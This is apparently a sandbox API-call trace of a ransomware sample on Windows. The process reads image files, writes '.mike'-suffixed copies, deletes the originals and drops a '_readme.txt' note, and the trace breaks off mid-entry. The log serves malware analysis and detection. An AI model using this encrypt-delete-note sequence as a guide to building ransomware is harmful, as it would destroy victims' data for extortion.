GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.468] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.468] GetFileType (hFile=0x264) returned 0x1 [0042.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.468] GetFileType (hFile=0x264) returned 0x1 [0042.468] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0042.468] ReadFile (in: hFile=0x264, lpBuffer=0x22853c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22853c0*, lpNumberOfBytesRead=0x2af0c8*=0x425, lpOverlapped=0x0) returned 1 [0042.470] CloseHandle (hObject=0x264) returned 1 [0042.470] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", lpFilePart=0x0) returned 0x42 [0042.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.470] GetFileType (hFile=0x264) returned 0x1 [0042.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.471] GetFileType (hFile=0x264) returned 0x1 [0042.471] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0042.471] WriteFile (in: hFile=0x264, lpBuffer=0x2289b54*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2289b54*, lpNumberOfBytesWritten=0x2af0bc*=0x430, lpOverlapped=0x0) returned 1 [0042.471] CloseHandle (hObject=0x264) returned 1 [0042.472] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", lpFilePart=0x0) returned 0x42 [0042.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0042.472] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.472] GetFileType (hFile=0x264) returned 0x1 [0042.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0042.472] GetFileType (hFile=0x264) returned 0x1 [0042.473] WriteFile (in: hFile=0x264, lpBuffer=0x228cd60*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x228cd60*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0042.473] CloseHandle (hObject=0x264) returned 1 [0042.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", lpFilePart=0x0) returned 0x42 [0042.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.474] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe384fec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe384fec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe384fec0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x650)) returned 1 [0042.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike", lpFilePart=0x0) returned 0x42 [0042.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.474] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x228e420 | out: lpFileInformation=0x228e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe384fec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe384fec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe384fec0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x650)) returned 1 [0042.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.474] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", dwFileAttributes=0x80) returned 1 [0042.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.475] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 1 [0042.476] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.476] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.476] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0042.476] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt", lpFilePart=0x0) returned 0x42 [0042.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0042.476] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0042.477] GetFileType (hFile=0x264) returned 0x1 [0042.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0042.477] GetFileType (hFile=0x264) returned 0x1 [0042.477] WriteFile (in: hFile=0x264, lpBuffer=0x2290040*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x2290040*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0042.478] CloseHandle (hObject=0x264) returned 1 [0042.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0042.478] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.478] GetFileType (hFile=0x264) returned 0x1 [0042.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0042.478] GetFileType (hFile=0x264) returned 0x1 [0042.478] CloseHandle (hObject=0x264) returned 1 [0042.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.479] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.479] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0042.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0042.479] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0042.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.479] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), fInfoLevelId=0x0, lpFileInformation=0x2292640 | out: lpFileInformation=0x2292640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x692)) returned 1 [0042.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.479] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.479] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), fInfoLevelId=0x0, lpFileInformation=0x2292928 | out: lpFileInformation=0x2292928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x692)) returned 1 [0042.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.479] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.479] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", lpFilePart=0x0) returned 0x42 [0042.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.479] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", lpFilePart=0x0) returned 0x42 [0042.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0042.480] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0042.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", lpFilePart=0x0) returned 0x42 [0042.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.480] GetFileType (hFile=0x264) returned 0x1 [0042.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.480] GetFileType (hFile=0x264) returned 0x1 [0042.480] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0042.481] WriteFile (in: hFile=0x264, lpBuffer=0x2293654*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2293654*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0042.482] CloseHandle (hObject=0x264) returned 1 [0042.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0042.482] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), fInfoLevelId=0x0, lpFileInformation=0x22931a8 | out: lpFileInformation=0x22931a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x692)) returned 1 [0042.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.482] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.482] GetFileType (hFile=0x264) returned 0x1 [0042.482] GetFileType (hFile=0x264) returned 0x1 [0042.482] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0042.482] ReadFile (in: hFile=0x264, lpBuffer=0x2294760, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2294760*, lpNumberOfBytesRead=0x2af0c8*=0x692, lpOverlapped=0x0) returned 1 [0042.484] CloseHandle (hObject=0x264) returned 1 [0042.484] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", lpFilePart=0x0) returned 0x42 [0042.484] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.484] GetFileType (hFile=0x264) returned 0x1 [0042.484] GetFileType (hFile=0x264) returned 0x1 [0042.484] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0042.484] WriteFile (in: hFile=0x264, lpBuffer=0x2299d94*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2299d94*, lpNumberOfBytesWritten=0x2af0bc*=0x6a0, lpOverlapped=0x0) returned 1 [0042.485] CloseHandle (hObject=0x264) returned 1 [0042.485] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", lpFilePart=0x0) returned 0x42 [0042.485] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.485] GetFileType (hFile=0x264) returned 0x1 [0042.486] GetFileType (hFile=0x264) returned 0x1 [0042.486] WriteFile (in: hFile=0x264, lpBuffer=0x229cfa0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x229cfa0*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0042.487] CloseHandle (hObject=0x264) returned 1 [0042.487] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.487] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", lpFilePart=0x0) returned 0x42 [0042.487] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe384fec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe384fec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3876020, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x8c0)) returned 1 [0042.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike", lpFilePart=0x0) returned 0x42 [0042.488] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x229e660 | out: lpFileInformation=0x229e660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe384fec0, 